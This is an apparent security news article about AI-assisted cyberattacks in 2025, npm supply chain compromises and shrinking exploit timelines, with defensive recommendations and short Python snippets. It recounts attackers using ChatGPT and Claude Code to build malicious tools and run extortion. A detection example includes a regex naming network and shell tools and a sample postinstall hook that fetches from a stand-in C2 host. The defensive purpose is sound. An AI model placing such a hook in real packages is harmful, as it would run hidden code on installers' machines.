AI-Driven Cyberattacks, Supply Chain Threats and Defense Tactics


CyberSecureFox Editorial Team

In 2025, the barrier to entry for sophisticated cyberattacks collapsed: teenagers with no technical skills, using systems built on large language models, carried out breaches involving millions of records and multi‑million‑dollar extortion schemes, while the average time from vulnerability disclosure to the appearance of a weaponized exploit shrank from more than 700 days in 2020 to 44 days in 2025. Against this backdrop, the traditional strategy of “patch faster than the attackers” stopped working. Organizations that rely on open source and public package repositories now need to move toward structurally eliminating entire classes of vulnerabilities and enforcing strict control over the software supply chain.

Technical details and key metrics for 2025–2026

Examples of attacks using AI

Non‑technical attackers in 2025 began carrying out operations that previously required the coordinated work of an experienced team:

  • In December 2025, a seventeen‑year‑old teenager in Osaka was arrested under Japan’s Unauthorised Computer Access Act for running malicious code that enabled the exfiltration of personal data on more than 7 million users of the Kaikatsu Club internet café network; the motive was to buy Pokémon cards.
  • In February 2025, three teenagers (aged 14, 15 and 16) with no programming experience used ChatGPT to create a tool that attacked Rakuten Mobile systems around 220,000 times; the proceeds were spent on game consoles and online gambling.
  • In July 2025, a single attacker, using the agentic programming platform Claude Code, conducted a month‑long extortion campaign against 17 organizations: the AI developed malicious code, systematized stolen files, analyzed financial statements to calibrate demands, and drafted the text of extortion emails.
  • In December 2025, another lone actor used Claude Code and ChatGPT to hack more than 10 Mexican government agencies and steal over 195 million taxpayer records.

All of these cases demonstrate that AI’s role is no longer auxiliary but end‑to‑end — from exploit development to automating financial analysis and communications.

Evolution of attacks on open source and package repositories

One of the most telling indicators has been the growth of malicious packages in public repositories:

  • around 55,000 malicious packages were recorded in 2022;
  • by 2025 the number had grown to 454,600, with marked spikes in 2023 (the release of GPT‑4) and 2025 (the mass adoption of agentic AI‑based programming tools).

In September 2025, the Shai-Hulud attack on the npm ecosystem compromised more than 500 packages. Secrets from 487 organizations were leaked, and $8.5 million was stolen from the Trust Wallet crypto wallet after attackers, using compromised credentials, replaced its Chrome extension.

Notably, the malicious packages were disguised as popular libraries (for example, chalk, debug), included documentation, unit tests and code that looked like telemetry modules. Traditional static analyzers and signature‑based scanners let them pass because their structure looked like “normal” software. This matches the broader trend where behavioral attack patterns are described at the level of tactics and techniques, for example in the MITRE ATT&CK matrix, rather than through static signatures.

Shortening time to vulnerability exploitation

Another key indicator is time to exploit, the time from disclosure of a vulnerability to the appearance of an exploit “in the wild”:

  • in 2020 it exceeded 700 days;
  • by 2025 it had shrunk to 44 days.

The Mandiant M‑Trends 2026 report paints an even more alarming picture: the window has effectively become negative, since exploits increasingly appear before patches, and 28.3% of CVE entries are exploited within 24 hours of disclosure. Against this backdrop, vulnerability catalogs such as NVD are turning into a task list for criminals, which can be quickly automated with AI.

Imbalance between attack speed and defense speed

Edgescan data for 2025 shows that the average time to fix known high‑ and critical‑severity vulnerabilities is 74 days, and 45% of vulnerabilities in the infrastructure of large companies (1,000 or more employees) remain unremediated. In this context, the average exploit development time (44 days) and the share of attacks in the first 24 hours after disclosure create a persistent advantage for attackers.

Growing AI capabilities for code development

As frontier models (ChatGPT, Claude, Gemini) improved their performance on software development benchmarks (for example, SWE-bench), their contribution to offensive operations increased noticeably:

  • in August 2024, top models automatically solved about 33% of real GitHub issues from SWE-bench;
  • by December 2025, this figure had reached almost 81%.

This means that most routine and medium‑complexity development of exploits and utilities is now available to attackers as a service, rather than as a hard‑won competence.

A structural response attempt: Chainguard Libraries

Amid the explosive growth of supply chain attacks, an approach is emerging that aims not to speed up response but to eliminate entire classes of risk. An example is Chainguard Libraries, where each open source library is rebuilt from verified, attributed source code. The architectural goal is to make the following impossible:

  • compromising CI/CD processes through dependency substitution;
  • dependency confusion attacks;
  • theft and abuse of long‑lived tokens during builds;
  • attacks on package distribution infrastructure.

When tested on 8,783 malicious npm packages, Chainguard Libraries blocked 99.7% of them; for roughly 3,000 malicious Python packages, about 98%. This illustrates how much more effective measures embedded in the architecture of the supply chain itself are compared with simply adding new layers of detection.

Threat context: who is suffering most and how

The examples above show that attacks affect:

  • the public sector — from Japanese law enforcement to Mexican government agencies, where the leak of 195 million tax records creates long‑term risks of fraud and political manipulation;
  • telecom operators and critical infrastructure — the Rakuten Mobile incident shows that even teenagers can initiate large‑scale load or fraudulent operations against telecom platforms;
  • financial services and crypto platforms, as in the case of Trust Wallet and the theft of $8.5 million through poisoning a browser extension;
  • any business that depends on npm, PyPI and other open source repositories, where hundreds of thousands of malicious packages raise the baseline level of risk even for trivial dependencies.

The common denominator is massive dependence on external code and services, on top of which the traditional model of “update your antivirus and regularly install patches” no longer yields an acceptable level of residual risk. This is also confirmed by analysis from organizations such as CISA, which are consistently shifting their focus toward “secure by design” architectural principles.

Assessing impact on business and operations

  • Operational risks: forced code freezes after attacks on repositories (as after Shai-Hulud) lead to release delays, missed roadmaps and growing technical debt.
  • Financial losses: direct theft (millions of dollars in the Trust Wallet case), ransom payments, service downtime and subsequent investments in fast‑tracked security improvements.
  • Privacy risks and regulatory sanctions: the leak of 7 million Kaikatsu Club customer records and 195 million Mexican taxpayer records raises questions not only about fines but also about the impossibility of “revoking” data that has already been leaked.
  • Reputation and trust: users’ awareness that cybercrime can now be committed “by anyone with an AI assistant” increases sensitivity to news about incidents and lowers tolerance for outages.

A qualitatively new problem is the growing overlap between those who are willing to carry out attacks and those who are capable of doing so. Previously this was a narrow layer; now, thanks to AI, it is growing rapidly, and the scale of attacks is becoming less and less dependent on the size and maturity of a criminal group.

Practical recommendations for reducing risk

1. Accept as a baseline: the exploit will appear before you can patch

  • Plan vulnerability management processes based on the scenario that exploitation is possible within the first 24 hours after disclosure (or earlier), even if a patch has not yet been released.
  • Establish a separate track for handling critical vulnerabilities with more aggressive SLOs (hours to a few days), including temporary compensating controls (disabling functions, limiting exposed services, filtering traffic).
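The fast‑track idea above can be encoded as policy. The sketch below is a minimal illustration, not a standard: the SLO tiers and hour values are hypothetical and should be replaced with your organization's own thresholds. It computes a remediation deadline from the disclosure time, the severity, and whether the vulnerability is already known to be exploited (for example, because it appears in an exploited‑vulnerabilities catalog).

```python
from datetime import datetime, timedelta

# Hypothetical remediation SLOs (hours): known-exploited vulnerabilities get
# an aggressive deadline; everything else is tiered by severity. Tune these
# to your own risk appetite.
SLO_HOURS = {"exploited": 24, "critical": 72, "high": 24 * 7, "other": 24 * 30}

def remediation_deadline(disclosed_at: datetime, severity: str,
                         known_exploited: bool) -> datetime:
    """Deadline by which a patch or compensating control must be in place."""
    if known_exploited:
        tier = "exploited"
    elif severity.lower() in ("critical", "high"):
        tier = severity.lower()
    else:
        tier = "other"
    return disclosed_at + timedelta(hours=SLO_HOURS[tier])

# A vulnerability disclosed and already exploited must be handled within 24h.
disclosed = datetime(2025, 12, 1, 9, 0)
print(remediation_deadline(disclosed, "critical", known_exploited=True))
```

The point of making the policy executable is that the deadline can then be attached automatically to every incoming advisory, rather than negotiated per incident.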

2. Strictly control your software supply chain

  • Create an internal dependency repository (a mirror of npm, PyPI, etc.) where only vetted versions of libraries are approved and published.
  • Make it mandatory for packages to go through a review process (static analysis, manual review, comparison with known legitimate sources) before entering the production repository.
  • Consider solutions that rebuild open source libraries from attributed source code and provide guarantees of build immutability, similar to Chainguard Libraries, so that entire classes of attacks (dependency confusion, CI/CD compromise, binary substitution) become technically impossible.
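One cheap enforcement point for an internal mirror is the lockfile: in npm's package‑lock.json, each installed package records the `resolved` URL it was downloaded from, so a CI gate can reject builds that pulled anything from outside the mirror. The sketch below assumes that convention; the registry hostname is a placeholder.

```python
import json

# Hypothetical internal mirror URL -- replace with your own registry.
INTERNAL_REGISTRY = "https://npm.internal.example.com/"

def unapproved_sources(lockfile_text: str) -> list[str]:
    """List packages in a package-lock.json whose 'resolved' URL points
    outside the internal mirror."""
    lock = json.loads(lockfile_text)
    offenders = []
    for path, meta in lock.get("packages", {}).items():
        resolved = meta.get("resolved", "")
        if resolved and not resolved.startswith(INTERNAL_REGISTRY):
            offenders.append(path or "(root)")
    return offenders

sample = json.dumps({"packages": {
    "node_modules/chalk": {
        "resolved": "https://npm.internal.example.com/chalk/-/chalk-5.3.0.tgz"},
    "node_modules/debug": {
        "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz"},
}})
print(unapproved_sources(sample))  # only "node_modules/debug" is flagged
```

A non‑empty result fails the pipeline, which turns "use the internal mirror" from a guideline into an invariant.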

3. Strengthen detection of attacks at the behavioral level, not just in code

  • Do not rely on signature‑based scanners to detect malicious packages: AI‑generated code can easily masquerade as “normal” with documentation and tests.
  • Implement monitoring of dependency behavior: network requests during installation, attempts to access sensitive files, launching external processes from install scripts.
  • Use isolated environments (sandboxes) to test new packages before using them in CI/CD and production.
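A first behavioral filter can run before any sandbox: npm lifecycle hooks such as preinstall and postinstall execute arbitrary commands at install time, so flagging hooks that invoke network tools, inline interpreters, or encoded payloads is a useful triage step. The heuristics below are illustrative assumptions, not a complete detector, and will produce false positives that a reviewer must resolve.

```python
import json
import re

# Hypothetical suspicion heuristics: install-time scripts that reach for the
# network, spawn a shell, or decode payloads deserve manual review.
SUSPICIOUS = re.compile(r"curl|wget|node -e|base64|bash -c|powershell", re.I)
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

def risky_install_hooks(package_json_text: str) -> dict[str, str]:
    """Return install-time scripts from a package.json that match the
    suspicion heuristics."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {hook: cmd for hook, cmd in scripts.items()
            if hook in INSTALL_HOOKS and SUSPICIOUS.search(cmd)}

manifest = json.dumps({"name": "telemetry-utils", "scripts": {
    "postinstall": "node -e \"require('https').get('https://c2.example/x')\"",
    "test": "jest",
}})
print(risky_install_hooks(manifest))  # the postinstall hook is flagged
```

Anything flagged here goes to the sandbox for dynamic inspection; anything clean still gets installed only from the vetted mirror.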

4. Manage access to AI‑based development tools

  • Formalize a policy for using systems such as ChatGPT and Claude Code: a ban on uploading sensitive code fragments and secrets, and requirements for logging sessions.
  • Train developers and analysts on the risks not only of data leakage but also of misuse of AI — from unintentionally generating vulnerable code to helping circumvent internal controls.

5. Prepare for incidents in the supply chain

  • Define in advance a procedure for quickly “freezing” dependencies and rolling back to previous versions when a compromised package is detected.
  • Maintain a list of the libraries you use and their origin (essentially an internal inventory analogous to a software “bill of materials”), so that when a new attack on npm or another registry occurs, you can quickly determine who is affected.
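With such an inventory in place, answering "are we affected?" after an npm compromise becomes a set intersection. The sketch below assumes the inventory is derived from a package‑lock.json and that the advisory arrives as a list of (name, version) pairs; both the lockfile excerpt and the advisory contents are illustrative.

```python
import json

def affected_dependencies(lockfile_text: str,
                          compromised: set[tuple[str, str]]) -> list[tuple[str, str]]:
    """Cross-reference a package-lock.json inventory against a set of
    (name, version) pairs from a compromise advisory."""
    lock = json.loads(lockfile_text)
    inventory = set()
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # skip the root project entry
        name = path.split("node_modules/")[-1]
        inventory.add((name, meta.get("version", "")))
    return sorted(inventory & compromised)

lock = json.dumps({"packages": {
    "": {"version": "1.0.0"},
    "node_modules/chalk": {"version": "5.3.0"},
    "node_modules/left-pad": {"version": "1.3.0"},
}})
advisory = {("chalk", "5.3.0"), ("event-stream", "3.3.6")}
print(affected_dependencies(lock, advisory))  # chalk 5.3.0 is affected
```

Running this across all repositories in the organization turns a day of frantic grepping into a minutes‑long query, which matters when the exploitation window is measured in hours.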

The key takeaway: in a world where exploitation of vulnerabilities is accelerating faster than patch release cycles are shrinking, relying solely on response speed is doomed to fail. The first priority should be to create a controlled internal dependency repository and move all build and deployment processes onto it, in order to block as many classes of supply chain attacks as possible before they ever reach your environment.


The CyberSecureFox Editorial Team covers cybersecurity news, vulnerabilities, malware campaigns, ransomware activity, AI security, cloud security, and vendor security advisories. Articles are prepared using official advisories, CVE/NVD data, CISA alerts, vendor publications, and public research reports. Content is reviewed before publication and updated when new information becomes available.
